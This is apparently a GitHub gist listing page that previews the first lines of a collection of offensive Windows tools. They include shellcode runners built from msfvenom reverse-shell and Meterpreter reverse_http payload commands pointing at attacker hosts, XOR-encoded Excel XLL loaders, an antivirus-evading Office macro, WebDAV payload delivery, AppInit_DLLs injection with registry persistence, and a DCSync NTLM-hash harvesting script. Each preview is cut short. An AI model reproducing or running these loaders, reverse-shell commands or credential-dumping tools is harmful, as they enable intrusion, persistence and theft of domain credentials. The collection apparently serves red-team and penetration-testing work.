vysecurity
/ shellcodeExecute.c
Created
September 11, 2017 14:19
— forked from Arno0x/shellcodeExecute.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: cl.exe shellcode_execute.c | |
| // | |
| // Author: Arno0x0x, Twitter: @Arno0x0x | |
| #include <Windows.h> | |
| int main() | |
| { | |
| // Payload obtained with "msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.52.134" | |
| unsigned char b[] = |
vysecurity
/ shellcode_ExcelRegisterXLL.c
Created
September 11, 2017 14:19
— forked from Arno0x/shellcode_ExcelRegisterXLL.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll | |
| #include <Windows.h> | |
| __declspec(dllexport) void __cdecl xlAutoOpen(void); | |
| DWORD WINAPI ThreadFunction(LPVOID lpParameter) | |
| { | |
| // Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c" | |
| unsigned char b[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" |
vysecurity
/ shellcode_multibyteXOR_ExcelRegisterXLL.c
Created
September 11, 2017 14:19
— forked from Arno0x/shellcode_multibyteXOR_ExcelRegisterXLL.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: | |
| // cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll | |
| // | |
| // C/CPP code obtained like this: | |
| // 1. Get a raw meterpreter shellcode: | |
| // msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw | |
| // 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper): | |
| // ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor | |
| #include <Windows.h> |
vysecurity
/ macro_evade_av.vba
Created
September 11, 2017 14:19
— forked from Arno0x/macro_evade_av.vba
Load shellcode in macro, from bibliography souce
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #If VBA7 Then | |
| Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr | |
| Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr | |
| #Else | |
| Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long | |
| Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long | |
| Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long | |
| #End If |
vysecurity
/ macro_webdav_delivery.vba
Created
September 11, 2017 14:19
— forked from Arno0x/macro_webdav_delivery.vba
Office macro using WedDav mapping to deliver payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' Example of DBC2 msbuild.xml stager delivery through a webdav maping | |
| ' The stager file (msbuild.xml) can be generated from the DBC2 controller | |
| ' | |
| ' NOTE: | |
| ' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml) | |
| ' but it fails miserably for me, so I have to have to first map the drive... | |
| Sub Go() | |
| Dim cmd As String, srv As String |
vysecurity
/ appinitdllinjection.c
Created
September 11, 2017 14:19
— forked from Arno0x/appinitdllinjection.c
AppInit_DLLs injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll | |
| // | |
| // This DLL can only be injected in a x64 process | |
| // | |
| // Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll) | |
| // by using the AppInit_DLLs capability: | |
| // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma separated if required) | |
| // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs = 1 (to enable this mecanism) | |
| #include <windows.h> |
vysecurity
/ service.cs
Created
September 11, 2017 14:19
— forked from Arno0x/service.cs
A basic Windows service written in .Net/c#
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Creates a basic Windows Service using .Net framework. | |
| Compile: | |
| c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs | |
| Create the service with name "Service": | |
| sc create Service type=own binpath= c:\Path\To\service.exe | |
| Start the service: |
vysecurity
/ Invoke-WebDavDelivery.ps1
Created
September 11, 2017 14:19
Payload delivery using WebDAV PROPFIND only covert channel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WebDavDelivery | |
| { | |
| <# | |
| .SYNOPSIS | |
| Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it. | |
| This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data. | |
| Function: Invoke-WebDavDelivery | |
| Author: Arno0x0x, Twitter: @Arno0x0x |
vysecurity
/ Invoke-DCSync.ps1
Created
August 15, 2017 20:45
— forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
vysecurity
/ PowerView-3.0-tricks.ps1
Created
June 18, 2017 08:48
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set | |
| # Add : add a new object to a destination | |
| # Set : modify a given object | |
| # Invoke : lazy catch-all |